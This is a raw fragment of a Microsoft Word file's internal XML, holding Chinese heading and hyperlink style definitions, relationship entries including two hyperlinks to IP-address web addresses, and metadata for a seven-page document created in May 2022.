  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="001B7731"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"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标题 2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001B7731"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001B7731"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E373B5"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E373B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34932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120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259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hyperlink" Target="http://118.112.183.47:8800" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://58.17.185.178:8099" TargetMode="Externa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</TotalTime>
  <Pages>7</Pages>
  <Words>228</Words>
  <Characters>1306</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>10</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1531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川田</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>川田</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-27T06:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-27T06:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>